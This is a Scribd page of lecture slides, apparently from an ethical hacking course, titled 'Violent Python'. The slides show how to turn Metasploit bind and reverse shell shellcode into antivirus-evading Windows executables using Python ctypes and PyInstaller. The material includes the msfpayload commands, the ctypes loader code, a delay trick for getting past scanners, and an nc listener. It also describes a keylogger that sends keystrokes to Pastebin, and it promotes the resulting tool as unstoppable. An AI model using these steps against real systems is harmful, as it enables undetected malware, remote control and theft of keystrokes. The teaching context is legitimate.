Scribd
Upload
175 views

Violent Python

This document discusses techniques for bypassing antivirus software using Python. It describes creating payloads using Metasploit and exporting them to C code to compile to an EXE file. Several rounds of testing payloads against antivirus programs are discussed, with Kaspersky and F-Secure consistently detecting payloads but other programs like Norton, Avast and MSE missing detections. Adding delays is shown to allow payloads to evade some antivirus programs. Creating a keylogger payload and posting keys to a local pastebin site is also summarized. The document promotes these techniques and payloads as unstoppable by major antivirus programs.

Uploaded by

HolarmidayBHadaytunji
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
175 views

Violent Python

This document discusses techniques for bypassing antivirus software using Python. It describes creating payloads using Metasploit and exporting them to C code to compile to an EXE file. Several rounds of testing payloads against antivirus programs are discussed, with Kaspersky and F-Secure consistently detecting payloads but other programs like Norton, Avast and MSE missing detections. Adding delays is shown to allow payloads to evade some antivirus programs. Creating a keylogger payload and posting keys to a local pastebin site is also summarized. The document promotes these techniques and payloads as unstoppable by major antivirus programs.

Uploaded by

HolarmidayBHadaytunji
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 67

Violent Python

Bio

CNIT 124
Advanced Ethical Hacking

Violent Python
Good coding principles
Exception handling
Modular design
Optimization
Commenting
Flow charts

FORGET THEM ALL

Violent Python
We are hackers
We are here to BREAK STUFF
It should be fast and easy for a
complete novice to hack together a
simple script to do something fun!

Projects

Antivirus
Ungh! Good God y'all...

What is it GOOD For?

Mikko Hypponen Video

Metasploit Payloads

Metasploit
Hundreds of payloads
The simplest one: bind_tcp
Listens on a TCP port for commands

Simple Reverse Shell


One command to produce very
simple Windows EXE malware

Antivirus Catches It

Norton v. Shell.exe

Norton Identifies the Metasploit


Packer

VirusTotal: 37/49 Detections

How to
Become
007

Python v. AV
Round 1
shell_bind_tcp

Export Metasploit Payloads


to C

Use Ctypes Python Library

Compile it on Windows
Install these things, in order
Python 2.7
PyWin32
pip-Win
PyInstaller

This creates an EXE file that listens


on a TCP port

DEMO
On Kali
msfpayloadwindows/shell_bind_tcpC>foo
nanofoo

Change top to
fromctypesimport*
shellcode=(

Change bottom to
);
memorywithshell=create_string_buffer(shellcode,
len(shellcode))
shell=cast(memorywithshell,
CFUNCTYPE(c_void_p))
shell()

DEMO
On Windows, in pip-Win:
venvcipyienvname
pyinstalleronefilenoconsolefoo

VirusTotal: 1/50 Detection

Norton Support
I Tweeted about this, and
@NortonSupport replied
VirusTotal is not a fair test, because
real installed Norton uses Heuristic
Scanning
@NortonSupport gave me a link for a
30-day trial version :)

Norton Wins!

Kaspersky Wins!
Avast! doesn't detect it
Kaspersky detects it as
HEUR:Trojan.Win32.Generic

Python v. AV
Round 2
shell_bind_tcp
with a delay

DEMO
On Kali
cpfoofoo2
nanofoo2
x=raw_input("PressEntertocontinue")

On Windows, in pip-Win:
venvcipyienvname
pyinstalleronefilefoo2

Norton, Avast, & MSE Lose!

Kaspersky Wins!

Python v. AV
Round 3
shell_bind_tcp
in two stages
no delay

Other AV
Tested on Mar 24, 2014 with a twostage reverse shell and no time delay
Al these failed
Norton
Nod32
Avast!
360 Internet Security
McAfee
Kaspersky

Remember Mikko?

F-Secure Wins!

AV Challenge

Posted April 3, 2014


No reply from AV vendors, but Norton
improved its detection after that
Now a delay is required

Python v. AV
Round 4
shell_bind_tcp
with a delay

INSTRUCTIONS
On Kali
msfpayloadwindows/shell_reverse_tcp
LHOST=192.168.119.252C>rev
nanorev

Change top to
x=raw_input("PressEntertocontinue")
fromctypesimport*
shellcode=(

Change bottom to
);
memorywithshell=create_string_buffer(shellcode,
len(shellcode))
shell=cast(memorywithshell,CFUNCTYPE(c_void_p))
shell()

INSTRUCTIONS
On Windows, in pip-Win:
venvcipyienvname
pyinstalleronefilerev

On Kali
nclp4444

Norton Loses

Kaspersky Wins

Advanced Malware
Protection

ty @ChrisAbdalla_1 from HP ESP


TippingPoint

A friend in the financial industry


tested Evil.exe on a system protected
by FireEye
FireEye gives no alerts and lets it
post keystrokes right to Pastebin

Python Keylogger

Google
"Python
Keylogge
r"
I used this
one from 4
years ago

Post Keystrokes to Pastebin

Problem
Pastebin busted me for making too
many pastes in a 24-hour period
So I wrote my own Pastebin imitation

Kaspersky & Avast! LOSE

Norton WINS!

But just add a delay...

F-Secure LOSES!

PRODUCT
ANNOUNCEMENT!

Ultra-Advanced APT Tool

samsclass.info/evil.exe

UNSTOPPABLE
None of these products stop it
Norton
McAfee
Kaspersky
Nod32
F-Secure
Avast!
Microsoft Security Essentials

You might also like